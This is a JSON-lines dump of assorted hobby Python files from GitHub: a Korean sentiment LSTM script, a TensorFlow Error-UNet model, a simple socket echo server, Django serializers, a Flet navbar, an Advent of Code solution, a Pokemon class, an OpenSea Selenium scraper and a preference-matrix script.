list2.append(word1)\n\narr=np.array(list2)\narr=np.delete(arr,(0),axis=0)\narr=np.delete(arr,(0),axis=1)\n\nans1= []\nans2= []\nans3= []\narr2 =[]\n\nfor i in range(len(arr)):\n ans1.append(arr[i][0])\n ans2.append(arr[i][1])\n ans3.append(arr[i][2])\n arr2.append(arr[i][3:6])\n \n\nokt = Okt()\nmecab = Mecab(dicpath=r\"C:/mecab/mecab-ko-dic\")\n\nno1=[]\nno2=[]\nno3=[]\n\narr3=[]\n\n\nfor i in range(len(arr2)):\n arr3.append(arr2[i][0]+\" \"+arr2[i][1]+\" \"+arr2[i][2])\n\nokt1 =[]\n\nfor i in range(10000):\n a = okt.nouns(arr2[i][0]) \n b = okt.nouns(arr2[i][1])\n c = okt.nouns(arr2[i][2])\n d = okt.nouns(arr2[i][0])+okt.nouns(arr2[i][1])+okt.nouns(arr2[i][2])\n e = okt.nouns(arr3[i])\n okt1.append(list(set(d+e)))\n\nprint('----------------------')\n\n\nmecab1 =[]\n#with open('no1.txt','w',encoding='UTF-8') as s:\n \nfor i in range(10000):\n a = mecab.nouns(arr2[i][0]) \n b = mecab.nouns(arr2[i][1])\n c = mecab.nouns(arr2[i][2])\n d = mecab.nouns(arr2[i][0])+okt.nouns(arr2[i][1])+okt.nouns(arr2[i][2])\n e = mecab.nouns(arr3[i])\n mecab1.append(list(set(d+e)))\n\n \n#s.close()\n\n\n\n\n\n\n\nmix1 =[]\n\nfor i in range(10000):\n mix1.append(list(set(okt1[i]+mecab1[i])))\n\ntokenizer = Tokenizer()\ntokenizer2 = Tokenizer()\n\ntokenizer.fit_on_texts(mix1[0:10000])\ntokenizer2.fit_on_texts(ans1[0:10000])\n\nvocab_size = len(tokenizer.word_index)\nvocab_size2 = len(tokenizer2.word_index)\n\ntokenizer = Tokenizer(vocab_size)\ntokenizer2 = Tokenizer(vocab_size2)\n\ntokenizer.fit_on_texts(mix1[0:10000])\ntokenizer2.fit_on_texts(ans1[0:10000])\n\n\n\nX_train = tokenizer.texts_to_sequences(mix1[0:10000])\ny_train = tokenizer2.texts_to_sequences(ans1[0:10000])\n\nprint('리뷰의 최대 길이 :',max(len(review) for review in mix1))\nprint('리뷰의 평균 길이 :',sum(map(len, mix1))/len(mix1))\n\nmax_len=16\nmax_len2=1\n\n\nX_train = pad_sequences(X_train, maxlen=max_len)\ny_train = pad_sequences(y_train, maxlen=max_len2)\n\n\nembedding_dim = 100\nhidden_units = 128\n\nmodel = Sequential()\nmodel.add(Embedding(vocab_size, embedding_dim))\nmodel.add(LSTM(hidden_units))\nmodel.add(Dense(1, activation='sigmoid'))\n\nes = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=3)\nmc = ModelCheckpoint('best_model.h5', monitor='val_acc', mode='max', verbose=1, save_best_only=True)\n\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(X_train, y_train, epochs=1,callbacks=[es, mc], batch_size=64,validation_split=0.2)\n\n\n#loaded_model = load_model('best_model.h5')\n#print(\"\\n 테스트 정확도: %.4f\" % (loaded_model.evaluate(X_train, y_train)[1]))\n\n\ndef sentiment_predict(new_sentence):\n new_sentence = re.sub(r'[^ㄱ-ㅎㅏ-ㅣ가-힣 ]','', new_sentence)\n new_sentence = okt.morphs(new_sentence, stem=True) # 토큰화\n new_sentence = [word for word in new_sentence if not word in stopwords] # 불용어 제거\n encoded = tokenizer.texts_to_sequences([new_sentence]) # 정수 인코딩\n pad_new = pad_sequences(encoded, maxlen = max_len) # 패딩\n score = float(loaded_model.predict(pad_new)) # 예측\n if(score > 0.5):\n print(\"{:.2f}% 확률로 긍정 리뷰입니다.\\n\".format(score * 100))\n else:\n print(\"{:.2f}% 확률로 부정 리뷰입니다.\\n\".format((1 - score) * 100))\n","repo_name":"bellkjtt/competition","sub_path":"word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12664503712","text":"from __future__ import print_function, division\n\nimport numpy as np\nimport tensorflow as tf\n\nHACK_USE_LAST_VALUE = 
False\n\nclass ErrorUNet:\n # Create network given a bunch of config parameters.\n def __init__(self, depth, topLayerWindow, kernelsPerLayer, learningRate, betweenLayerSize=1, errorWeight=1, batchSize=1):\n # variables:\n self.beVars = []\n self.eeVars = []\n self.feVars = []\n self.bfVars = []\n self.efVars = []\n self.ffVars = []\n\n # Placeholders:\n self.oldFLayers = []\n self.oldELayers = []\n self.ELayers = []\n self.FLayers = []\n\n # State:\n self.prevELayers = []\n\n # Optimization:\n self.errorLoss = None\n self.predictionLoss = None\n self.totalLoss = None\n\n self.depth = depth\n self.windowSize = topLayerWindow * (2 ** (depth - 1))\n self.kernelsPerLayer = kernelsPerLayer\n # Input fed into the network. (batchSize x windowSize)\n self.inputHolder = tf.placeholder(tf.float32, [batchSize, self.windowSize], name=\"In_F_0\")\n # Output of the network. (batchSize x windowSize)\n self.outputHolder = tf.placeholder(tf.float32, [batchSize, self.windowSize], name=\"Out\")\n\n # Create Variables:\n for at in range(depth):\n atS = str(at)\n self.eeVars.append(self.batch1dConv( 2, at == 0, False, \"eeVar_\" + atS)) # mega hack: transposed conv2d invert out & in channel params\n self.feVars.append(self.batch1dConv(betweenLayerSize, at == 0, at == 0, \"feVar_\" + atS))\n self.efVars.append(self.batch1dConv(betweenLayerSize, at == 0, at == 0, \"efVar_\" + atS))\n self.ffVars.append(self.batch1dConv( 2, at == 1, False, \"ffVar_\" + atS))\n\n # Old Forward value placeholders:\n for at in range(depth):\n atS = str(at)\n windowSize = topLayerWindow * (2 ** (depth - 1 - at))\n print (\"NODES on level \" + str(at) + \" = \" + str(windowSize))\n channels = 1 if at == 0 else self.kernelsPerLayer\n self.oldELayers.append(tf.placeholder(tf.float32, [batchSize, windowSize, channels], name=\"oldE_\" + atS))\n self.prevELayers.append(np.random.randn(batchSize, windowSize, channels))\n self.beVars.append(self.batch1dConv(windowSize, at == 0, at == 0, \"beVar_\" + atS, isBias=True))\n self.bfVars.append(self.batch1dConv(windowSize, at == 0, at == 0, \"bfVar_\" + atS, isBias=True))\n\n print(\"BUILDING, old E -> old F\")\n # New Forward value placeholders:\n lastLayer = None\n for at in range(depth):\n print (\"Wiring OLD FORDWARD level \" + str(at) + \"...\")\n fLayer = None\n if at == 0:\n # B x W => B x W x 1\n inputExpanded = tf.expand_dims(self.inputHolder, 2)\n fLayer = inputExpanded\n else:\n fLayer = self.convWithBias(\"oldF_\" + str(at), [\n (lastLayer, self.ffVars[at], 'FF'),\n (self.oldELayers[at], self.efVars[at], 'EF')\n ], self.bfVars[at])\n self.oldFLayers.append(fLayer)\n lastLayer = fLayer\n\n\n # New Error value placeholders:\n print(\"BUILDING, old F -> new E\")\n lastLayer = None\n for at in range(depth - 1, -1, -1):\n print (\"Wiring ERROR level \" + str(at) + \"...\")\n eLayer = None\n if at == depth - 1:\n eLayer = self.convWithBias(\"E_\" + str(at), [\n (self.oldFLayers[at], self.feVars[at], 'FE')\n ], self.beVars[at])\n else:\n eLayer = self.convWithBias(\"E_\" + str(at), [\n (lastLayer, self.eeVars[at], 'EE'),\n (self.oldFLayers[at], self.feVars[at], 'FE')\n ], self.beVars[at])\n self.ELayers.append(eLayer)\n lastLayer = eLayer\n self.ELayers.reverse()\n\n # New Forward value placeholders:\n print(\"BUILDING, new E -> new F\")\n lastLayer = None\n for at in range(depth):\n print (\"Wiring FORDWARD level \" + str(at) + \"...\")\n fLayer = None\n if at == 0:\n # B x W => B x W x 1\n inputExpanded = tf.expand_dims(self.inputHolder, 2)\n fLayer = inputExpanded\n else:\n fLayer = 
self.convWithBias(\"F_\" + str(at), [\n (lastLayer, self.ffVars[at], 'FF'),\n (self.ELayers[at], self.efVars[at], 'EF')\n ], self.bfVars[at])\n self.FLayers.append(fLayer)\n lastLayer = fLayer\n\n # Debugging code:\n print (\"E and F layer sizes:\")\n for el in self.ELayers:\n print (el.get_shape())\n for fl in self.FLayers:\n print (fl.get_shape())\n\n # B x W => B x W x 1\n outHolderResized = tf.expand_dims(self.outputHolder, 2)\n\n if errorWeight == 0:\n # Without error loss, use the E layers as predictions (like UNet), not errors.\n self.prediction = self.ELayers[0]\n self.errorLoss = tf.constant(0)\n self.predictionLoss = tf.nn.l2_loss(self.prediction - outHolderResized) / self.windowSize\n self.totalLoss = self.predictionLoss\n else:\n # Output = Last Input plus predicted error\n self.prediction = self.FLayers[0] + self.ELayers[0]\n allNewEButFirst = tf.concat(self.ELayers[1:], 1)\n allOldFButFirst = tf.concat(self.oldFLayers[1:], 1)\n allNewFButFirst = tf.concat(self.FLayers[1:], 1)\n actualErrors = (allNewFButFirst - allOldFButFirst)\n self.errorLoss = (\n tf.nn.l2_loss(actualErrors - allNewEButFirst) +\n tf.nn.l2_loss((self.FLayers[0] - self.oldFLayers[0]) - self.ELayers[0]) +\n tf.nn.l2_loss(allNewEButFirst)\n ) / self.windowSize\n self.predictionLoss = tf.nn.l2_loss(self.prediction - outHolderResized) / self.windowSize\n self.totalLoss = tf.add(self.errorLoss * errorWeight, self.predictionLoss)\n\n globalStep = tf.Variable(0, trainable=False)\n decayedLearningRate = \\\n tf.train.exponential_decay(learningRate, globalStep, 100, 0.75, staircase=True)\n self.optimizer = \\\n tf.train.AdamOptimizer(decayedLearningRate).minimize(self.totalLoss)\n # tf.train.GradientDescentOptimizer(decayedLearningRate).minimize(self.totalLoss)\n\n def batch1dConv(self, width, firstLayer, lastLayer, name, isBias=False):\n inChannels = 1 if firstLayer else self.kernelsPerLayer\n outChannels = 1 if lastLayer else self.kernelsPerLayer\n if isBias:\n # bias = B x W x C\n filt = tf.Variable(np.random.randn(width, inChannels) * 0.1, dtype=tf.float32, name=name)\n return tf.expand_dims(filt, 0)\n else:\n # kernels = W x C x C\n return tf.Variable(np.random.randn(width, inChannels, outChannels), dtype=tf.float32, name=name)\n\n def convWithBias(self, name, convolutions, bias):\n # TODO: Dilation, not stride?\n result = bias\n print (\" * bias shape (= output shape): \" + str(bias.get_shape()))\n for convolution in convolutions:\n value, kernel, cType = convolution\n print (\" + conv value shape:\" + str(value.get_shape()))\n print (\" * conv kernel shape: \" + str(kernel.get_shape()))\n print (\" * conv type: \" + cType)\n convResult = None\n if cType == 'EE':\n convResult = self.eeConv(value, kernel, name)\n elif cType == 'FF':\n convResult = self.ffConv(value, kernel)\n else:\n assert cType == 'FE' or cType == 'EF'\n convResult = self.efeConv(value, kernel)\n print (\" = result: \" + str(convResult.get_shape()))\n result = tf.add(result, convResult)\n activation = tf.nn.tanh(result)\n # activation = tf.nn.relu(result)\n # activation = tf.nn.tan(tf.nn.tanh(result))\n return tf.identity(activation, name=name + \"_activation\")\n\n def eeConv(self, eIn, kernel, name):\n # e layer 1D -> 2D: B x We x C -> B x We x 1 x C\n eIn2d = tf.expand_dims(eIn, 2)\n # filter, 1D -> 2D: Wk x C x C -> Wk x 1 x C x C\n kernel2d = tf.expand_dims(kernel, 1)\n eInShape = eIn2d.get_shape().as_list()\n kShape = kernel2d.get_shape().as_list()\n outShape = (eInShape[0], eInShape[1] * 2, eInShape[2], kShape[2])\n print (\"EIn2d shape 
= \" + str(eIn2d.get_shape()))\n print (\"kernel2d shape = \" + str(kernel2d.get_shape()))\n print (\"OutShape = \" + str(outShape))\n result = tf.nn.conv2d_transpose(eIn2d, kernel2d, output_shape=outShape, strides=[1, 2, 2, 1], name=name)\n return tf.squeeze(result, [2])\n\n def ffConv(self, fIn, kernel):\n return tf.nn.conv1d(fIn, kernel, stride=2, padding='VALID')\n\n def efeConv(self, value, kernel):\n return tf.nn.conv1d(value, kernel, stride=1, padding='SAME')\n\n def train(self, sess, inTensor, outTensor):\n # Given input and true output, update weights based from the optimizer\n if HACK_USE_LAST_VALUE:\n prediction = np.roll(inTensor, -1, axis=1)\n prediction[0, -1] = prediction[0, -2]\n err = outTensor - prediction\n errl2 = sum(sum(err ** 2)) / 2\n pLoss = errl2 / self.windowSize\n return 0, pLoss, pLoss\n\n inData = {\n self.inputHolder: inTensor,\n self.outputHolder: outTensor,\n }\n for i in range(len(self.oldFLayers)):\n inData[self.oldELayers[i]] = self.prevELayers[i]\n\n opt, eLayers, eLoss, pLoss, tLoss = sess.run(\n [self.optimizer, self.ELayers, self.errorLoss, self.predictionLoss, self.totalLoss],\n feed_dict=inData\n )\n self.prevELayers = eLayers\n return eLoss, pLoss, tLoss\n\n def generate(self, sess, inTensor):\n # Given input, generate the predicted output.\n if HACK_USE_LAST_VALUE:\n prediction = np.roll(inTensor, -1, axis=1)\n prediction[0, -1] = prediction[0, -2]\n return prediction\n\n inData = {\n self.inputHolder: inTensor,\n }\n for i in range(len(self.oldELayers)):\n inData[self.oldELayers[i]] = self.prevELayers[i]\n prediction, eLayers = sess.run([self.prediction, self.ELayers], feed_dict=inData)\n self.prefELayers = eLayers\n return prediction[:, :, 0]\n\n def debugValues(self, sess, inTensor):\n # Print all the variables and placeholders when given a particular input.\n inData = {\n self.inputHolder: inTensor,\n }\n for i in range(len(self.oldELayers)):\n inData[self.oldELayers[i]] = self.prevELayers[i]\n\n [beVars, eeVars, feVars, bfVars, efVars, ffVars, ELayers, FLayers] = sess.run(\n [self.beVars, self.eeVars, self.feVars, self.bfVars, self.efVars, self.ffVars, self.ELayers, self.FLayers],\n feed_dict=inData\n )\n self.debugBE(beVars)\n self.debugEE(eeVars)\n self.debugFE(feVars)\n self.debugBF(bfVars)\n self.debugEF(efVars)\n self.debugFF(ffVars)\n self.debugOldF(self.prevFLayers)\n self.debugE(ELayers)\n self.debugF(FLayers)\n\n def debugBE(self, beVars):\n for i in range(len(beVars)):\n print (\"be_%d = %s\" % (i, str(beVars[i][0, :, 0])))\n\n def debugEE(self, eeVars):\n for i in range(len(eeVars)):\n print (\"ee_%d = %s\" % (i, str(eeVars[i][0, :, 0])))\n\n def debugFE(self, feVars):\n for i in range(len(feVars)):\n print (\"fe_%d = %s\" % (i, str(feVars[i][0, :, 0])))\n\n def debugBF(self, bfVars):\n for i in range(len(bfVars)):\n print (\"bf_%d = %s\" % (i, str(bfVars[i][0, :, 0])))\n\n def debugEF(self, efVars):\n for i in range(len(efVars)):\n print (\"ef_%d = %s\" % (i, str(efVars[i][0, :, 0])))\n\n def debugFF(self, ffVars):\n for i in range(len(ffVars)):\n print (\"ff_%d = %s\" % (i, str(ffVars[i][0, :, 0])))\n\n def debugOldF(self, oldFLayers):\n for i in range(len(oldFLayers)):\n print (\"oldF_%d = %s\" % (i, str(oldFLayers[i][0, :, 0])))\n\n def debugE(self, ELayers):\n for i in range(len(ELayers)):\n print (\"E_%d = %s\" % (i, str(ELayers[i][0, :, 0])))\n\n def debugF(self, FLayers):\n for i in range(len(FLayers)):\n print (\"F_%d = %s\" % (i, str(FLayers[i][0, :, 
0])))\n","repo_name":"padster/Error-UNet","sub_path":"errorUnet.py","file_name":"errorUnet.py","file_ext":"py","file_size_in_byte":12757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34849210837","text":"from socket import *\naddress='172.16.0.5' #监听哪些网络 127.0.0.1是监听本机 0.0.0.0是监听整个网络\nport=8080 #监听自己的哪个端口\nbuffsize=1024 #接收从客户端发来的数据的缓存区大小\ns = socket(AF_INET, SOCK_STREAM)\ns.bind((address,port))\ns.listen(1) #最大连接数\ndict={\"qwertyuiop\":1}\n\nprint(\"Server Start!\")\nwhile True:\n clientsock,clientaddress=s.accept()\n print('connect from:',clientaddress)\n#传输数据都利用clientsock,和s无关\n while True:\n recvdata=clientsock.recv(buffsize).decode('utf-8')\n if recvdata=='exit' or not recvdata:\n break\n senddata=recvdata+'from sever'\n print(senddata)\n if(senddata in dict):\n dict[senddata]=dict[senddata]-1\n clientsock.send(senddata.encode())\n clientsock.close()\ns.close()\n","repo_name":"JunJianX/Reward","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40150875348","text":"'''def wish(name):\r\n print(\"Hello,\", name,\"How are you doing\")\r\n\r\nwish(\"akash\")\r\nwish(\"Bhanu\")\r\nwish(\"Tiwari\")\r\n'''\r\n\r\n'''def number(n):\r\n print(\"The square of\\t\",n,\"=>\\t\",n*n)\r\n\r\nnumber(10)\r\nnumber(11)\r\n'''\r\n\r\ndef number():\r\n n=int(input(\"Enter a number=>\\t\"))\r\n if n%2==1:\r\n print(n,\"is prime number\")\r\n elif n%2==0:\r\n print(n,\"is EVEN number\")\r\n else:\r\n print(n,\"is ODD number\")\r\nnumber()\r\n","repo_name":"akashbhanu009/Functions","sub_path":"Basic_Function_Call.py","file_name":"Basic_Function_Call.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"16956694671","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nfrom base import settings\nfrom versioning.models import Revision, Document\n\n\nclass RevisionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Revision\n fields = ['id', 'created', 'file', 'index', 'revision_url']\n\n\nclass DocumentSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n created = serializers.DateTimeField(read_only=True)\n url = serializers.CharField(allow_blank=False)\n revisions = serializers.HyperlinkedRelatedField(read_only=True, many=True, view_name='revision-detail')\n file = serializers.FileField(write_only=True)\n\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'id', 'username')\n","repo_name":"dimliakop/django","sub_path":"versioning/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42172017557","text":"import flet as ft\n\n\nclass Navigation(ft.Row):\n def __init__(\n self,\n page: ft.Page,\n alignment=\"center\",\n ):\n self.page = page\n\n super().__init__(alignment=alignment)\n self.controls = [\n self.route(\"Home\", \"/index\"),\n self.route(\"About\", \"/about\"),\n self.route(\"Contact\", \"/contact/index\"),\n ]\n\n def route(self, title: str, route_to: str) -> ft.Control:\n return ft.Text(\n size=11,\n weight=\"bold\",\n color=\"white\",\n spans=[ft.TextSpan(title, on_click=lambda __: 
self.page.go(route_to))],\n )\n","repo_name":"LineIndent/fletxible","sub_path":"src/core/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"96"} +{"seq_id":"9800536092","text":"import math\nimport os\n\nCRT_WIDTH = 40\nCRT_HEIGHT = 6\nSIGNAL_INTERVAL = 40\nSIGNAL_OFFSET = 20\nNOOP = \"noop\"\nDARK_PX = \".\"\nLIGHT_PX = \"#\"\n\n\ndef main():\n with open(os.path.dirname(__file__) + \"/input.txt\") as f:\n lines = f.read().split(\"\\n\")\n\n crt = [[DARK_PX for _ in range(CRT_WIDTH)] for _ in range(CRT_HEIGHT)]\n\n signals = []\n cycle = 0\n x = 1\n for line in lines:\n update_crt(crt, cycle, x)\n cycle += 1\n append_if_interesting_cycle(signals, cycle, x)\n if line != NOOP:\n update_crt(crt, cycle, x)\n cycle += 1\n append_if_interesting_cycle(signals, cycle, x)\n x += int(line.split()[1])\n\n print(sum(signals))\n print(render_crt(crt))\n\n\ndef render_crt(crt):\n return \"\\n\".join(map(lambda row: \"\".join(row), crt))\n\n\ndef update_crt(crt, cycle, x):\n row = math.floor(cycle / CRT_WIDTH)\n col = cycle % CRT_WIDTH\n\n if abs(x - col) <= 1:\n crt[row][col] = LIGHT_PX\n\n\ndef append_if_interesting_cycle(signals, cycle, signal):\n if is_interesting_cycle(cycle):\n signals.append(cycle * signal)\n\n\ndef is_interesting_cycle(n):\n return (n + SIGNAL_OFFSET) % SIGNAL_INTERVAL == 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ngerritsen/advent-of-code-2022","sub_path":"src/10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36532107062","text":"from pokemon_battle.pokemon import Pokemon\n\n\nclass Trainer:\n def __init__(self, name):\n self.name = name\n self.pokemon = []\n self.pokemon_obj = []\n\n def add_pokemon(self, pokemon: Pokemon):\n if pokemon.name in self.pokemon:\n return \"This pokemon is already caught\"\n\n self.pokemon.append(pokemon.name)\n self.pokemon_obj.append(pokemon)\n return f\"Caught {pokemon.pokemon_details()}\"\n\n def release_pokemon(self, pokemon_name: str):\n if pokemon_name not in self.pokemon:\n return \"Pokemon is not caught\"\n\n self.pokemon.remove(pokemon_name)\n self.find_obj(pokemon_name)\n return f\"You have released {pokemon_name}\"\n\n def find_obj(self, pokemon_name):\n for poke in self.pokemon_obj:\n if poke.name == pokemon_name:\n self.pokemon_obj.remove(poke)\n break\n\n def trainer_data(self):\n output = f\"Pokemon Trainer {self.name}\\nPokemon count {len(self.pokemon)}\\n\"\n for poke in self.pokemon_obj:\n output += '- ' + poke.pokemon_details() + '\\n'\n return output.rstrip()\n\n\npokemon = Pokemon(\"Pikachu\", 90)\nprint(pokemon.pokemon_details())\ntrainer = Trainer(\"Ash\")\nprint(trainer.add_pokemon(pokemon))\nsecond_pokemon = Pokemon(\"Charizard\", 110)\nprint(trainer.add_pokemon(second_pokemon))\nprint(trainer.release_pokemon(\"Pikachu\"))\nprint(trainer.trainer_data())\n","repo_name":"rzlatkov/Softuni","sub_path":"OOP/Defining_Classes/pokemon_battle/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18151452832","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nimport time \n\n\ndef openSeaWS():\n firefox_options = Options()\n firefox_options.add_argument(\"--headless\")\n driver = 
webdriver.Firefox(executable_path=r'./geckodriver',options=firefox_options)\n\n    url = 'https://opensea.io/rankings'\n\n    driver.maximize_window()\n\n    driver.get(url)\n    i = 1\n    nftNames = []\n    while(True):\n        try:\n\n            screen_height = driver.execute_script(\"return window.screen.height;\")\n\n            i += 1\n            htmlTest = driver.find_element_by_xpath('/html/body/div[1]/div/main/div/div[2]/div/div[3]').get_attribute('outerHTML')\n            print(f\"the html is {len(htmlTest)}\")\n            if len(htmlTest)>124:\n\n\n                button = driver.find_element_by_xpath('/html/body/div[1]/div/main/div/div[3]/button[2]')\n                textNft = driver.find_element_by_xpath('/html/body/div[1]/div/main/div/div[2]/div/div[3]')\n\n                nftNames.append(textNft.text)\n                scroll_height = driver.execute_script(\"return document.body.scrollHeight;\")\n                time.sleep(5)\n                print(f\"the value of i is: {i}\")\n                print(f\"the screen height is: {screen_height}\")\n                print(f\"the scroll height is: {scroll_height}\")\n                driver.execute_script(\"window.scrollTo(0,{screen_height}*{i});\".format(screen_height=screen_height,i=i))\n                print(f\"the screen height * i = {screen_height*i}\")\n                if screen_height * i > scroll_height:\n                    print(\"if branch triggered\")\n                    i = 1\n                    button.click()\n                    time.sleep(10)\n            else:\n                print(\"the inner html is lower than 124\")\n                break\n        except:\n            print(\"breaking\")\n            break\n\n\n    driver.quit()\n\n    with open('nftCollections.txt','w') as f:\n        for nfts in nftNames:\n            f.write(\"%s\\n\" % nfts)\n        print(\"Done writing the file\")\n\nif __name__ == '__main__':\n    openSeaWS()\n","repo_name":"JaimeHidalgo/dockerOS","sub_path":"openSeaWS.py","file_name":"openSeaWS.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"35210571987","text":"import pickle\nimport numpy as np\nimport pandas as pd\nimport csv\nfrom collections import Counter\n\ndef big_array():\n    # task index in big array\n    nodes_df = pd.read_csv('Foursquare/task_graph_X.csv')\n    task_ids = list(set(nodes_df['node_name/poi_id'].tolist()))\n    task_id2idx_dict = dict(zip(task_ids, range(len(task_ids))))\n    # print(task_id2idx_dict)\n\n\n    # worker index in big array\n    nodes_df = pd.read_csv('Foursquare/worker_graph_X.csv')\n    user_ids = list(set(nodes_df['node_name/worker_id'].tolist()))\n    user_id2idx_dict = dict(zip(user_ids, range(len(user_ids))))\n    # print(user_id2idx_dict)\n\n    # big worker2task preference (2551, 9722)\n    for i, w2t_pre in enumerate(worker2task_pre):\n        user_id = w2t_pre[0].split('_')[0]\n        max_val = np.max(w2t_pre[1:])\n        min_val = np.min(w2t_pre[1:])\n        w2t_list = w2t_pre[1:][0]\n        w2t_list = np.ravel([(x - min_val) / (max_val - min_val) for x in w2t_pre[1:]])\n\n        for j, t2w_pre in enumerate(task2worker_pre):\n            task_id = int(t2w_pre[0].split('_')[0])\n            big_arr_w2t[user_id2idx_dict[int(user_id)]][int(task_id2idx_dict[int(task_id)])] = w2t_list[task_id2idx_dict[int(task_id)]]\n\n    # big task2worker preference (9722, 2551)\n    for i, t2w_pre in enumerate(task2worker_pre):\n        task_id = t2w_pre[0].split('_')[0]\n        max_val = np.max(t2w_pre[1:])\n        min_val = np.min(t2w_pre[1:])\n        t2w_list = t2w_pre[1:][0]\n        t2w_list = np.ravel([(x - min_val) / (max_val - min_val) for x in t2w_pre[1:]])\n\n        for j, w2t_pre in enumerate(worker2task_pre):\n            user_id = int(w2t_pre[0].split('_')[0])\n            big_arr_t2w[int(task_id2idx_dict[int(task_id)])][user_id2idx_dict[int(user_id)]] = t2w_list[user_id2idx_dict[int(user_id)]]\n    \n    np.savetxt(\"GroundTruth_data/array_big_w2t.csv\", big_arr_w2t, delimiter=' ')\n    
np.savetxt(\"GroundTruth_data/array_big_t2w.csv\", big_arr_t2w, delimiter=' ')\n\n return big_arr_w2t, big_arr_t2w\n\n\ndef small_array(worker2task_pre, task2worker_pre, DATASET):\n # worker index in small array\n worker_list = [int(x.split('_')[0]) for x,_ in worker2task_pre]\n user_id2idx_dict_small = dict(zip(worker_list, range(len(worker_list))))\n # print(user_id2idx_dict_small)\n\n # task index in small array\n task_list = [int(x.split('_')[0]) for x,_ in task2worker_pre]\n task_id2idx_dict_small = dict(zip(task_list, range(len(task_list))))\n\n # small worker2task preference (1681, 3683)\n for i, w2t_pre in enumerate(worker2task_pre):\n user_id = w2t_pre[0].split('_')[0]\n max_val = np.max(w2t_pre[1:])\n min_val = np.min(w2t_pre[1:])\n w2t_list = w2t_pre[1:][0]\n w2t_list = np.ravel([(x - min_val) / (max_val - min_val) for x in w2t_pre[1:]])\n\n for j, t2w_pre in enumerate(task2worker_pre):\n task_id = int(t2w_pre[0].split('_')[0])\n small_arr_w2t[user_id2idx_dict_small[int(user_id)]][int(task_id2idx_dict_small[int(task_id)])] = float(w2t_list[task_id2idx_dict_small[int(task_id)]])\n \n # big task2worker preference (3683, 1681)\n for i, t2w_pre in enumerate(task2worker_pre):\n task_id = t2w_pre[0].split('_')[0]\n max_val = np.max(t2w_pre[1:])\n min_val = np.min(t2w_pre[1:])\n t2w_list = t2w_pre[1:][0]\n t2w_list = np.ravel([(x - min_val) / (max_val - min_val) for x in t2w_pre[1:]])\n\n for j, w2t_pre in enumerate(worker2task_pre):\n user_id = int(w2t_pre[0].split('_')[0])\n small_arr_t2w[int(task_id2idx_dict_small[int(task_id)])][user_id2idx_dict_small[int(user_id)]] = float(t2w_list[user_id2idx_dict_small[int(user_id)]])\n \n if DATASET == 'Foursquare':\n np.savetxt('GroundTruth_data/Foursquare/array_small_w2t.csv', small_arr_w2t, delimiter=',')\n np.savetxt('GroundTruth_data/Foursquare/array_small_t2w.csv', small_arr_t2w, delimiter=',')\n if DATASET == 'Yelp':\n np.savetxt('GroundTruth_data/Yelp_FGRec/array_small_w2t.csv', small_arr_w2t, delimiter=',')\n np.savetxt('GroundTruth_data/Yelp_FGRec/array_small_t2w.csv', small_arr_t2w, delimiter=',')\n \n return small_arr_w2t, small_arr_t2w, user_id2idx_dict_small, task_id2idx_dict_small\n\n\ndef new_test_data(user_id2idx_dict_small, task_id2idx_dict_small, test_path, new_test_path):\n test_checkin_new = []\n \n with open(test_path) as f_test:\n for i, line in enumerate(f_test):\n if i == 0:\n continue\n user_id = line.strip().split(',')[0]\n poi_id = line.strip().split(',')[1]\n if int(user_id) in user_id2idx_dict_small.keys() and int(poi_id) in task_id2idx_dict_small.keys():\n test_checkin_new.append(line.strip())\n\n print(len(test_checkin_new))\n np.savetxt(new_test_path, test_checkin_new, fmt=\"%s\", \n header='user_id,poi_id,timestamp,norm_time,poi_catid,latitude,longitude,trajectory_id,worker_trajectory_id')\n\n\ndef get_pre_info(user_id2idx_dict_small, task_id2idx_dict_small, test_path, test_new_path, DATASET):\n test_new_df = pd.read_csv(test_path)\n user_ids = list(set(test_new_df['user_id'].tolist()))\n poi_ids = list(set(test_new_df['poi_id'].tolist()))\n # generate the preference result all valid tasks and workers (1671, 3682)\n test_df = pd.read_csv(test_new_path)\n user_ids_old = []\n poi_ids_old = []\n for i in list(set(test_df['user_id'].tolist())):\n if i in user_id2idx_dict_small.keys():\n user_ids_old.append(i)\n for j in list(set(test_df['poi_id'].tolist())):\n if j in task_id2idx_dict_small.keys():\n poi_ids_old.append(j)\n\n final_user = [user_id2idx_dict_small[k] for k in 
